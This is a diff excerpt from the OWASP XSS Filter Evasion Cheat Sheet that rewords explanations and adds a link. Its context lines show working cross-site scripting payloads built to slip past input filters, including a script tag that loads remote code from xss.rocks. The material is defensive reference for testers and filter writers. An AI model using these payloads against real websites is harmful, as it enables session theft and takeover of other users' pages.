OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 ````

-Yair Amit noted that there is a slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces.
+Yair Amit noted that there is a slightly different behavior between the Trident (IE) and Gecko (Firefox) rendering engines that allows just a slash between the tag and the parameter with no spaces.
 This could be useful in a attack if the system does not allow spaces.

 `<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>`

 ### Extraneous Open Brackets

-This XSS vector could defeat certain detection engines that work by checking matching pairs of open and close angle brackets then comparing of the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).
+This XSS vector could defeat certain detection engines that work by checking matching pairs of open and close angle brackets then comparing the tag inside, instead of a more efficient algorithm like [Boyer-Moore](https://en.wikipedia.org/wiki/Boyer%E2%80%93Moore_string-search_algorithm) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).
 The double slash comments out the ending extraneous bracket to suppress a JavaScript error:

 `<<SCRIPT>alert("XSS");//\<</SCRIPT>`